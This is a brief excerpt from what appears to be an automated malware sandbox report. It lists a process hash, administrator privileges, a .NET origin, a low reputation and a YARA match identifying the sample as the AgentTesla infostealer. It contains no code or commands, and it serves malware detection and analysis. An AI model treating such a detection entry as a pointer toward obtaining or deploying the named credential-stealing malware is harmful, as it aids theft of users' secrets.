                                              MD5 hash:5CF87A160007A5E6C7A4D24E1D831327
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              No disassembly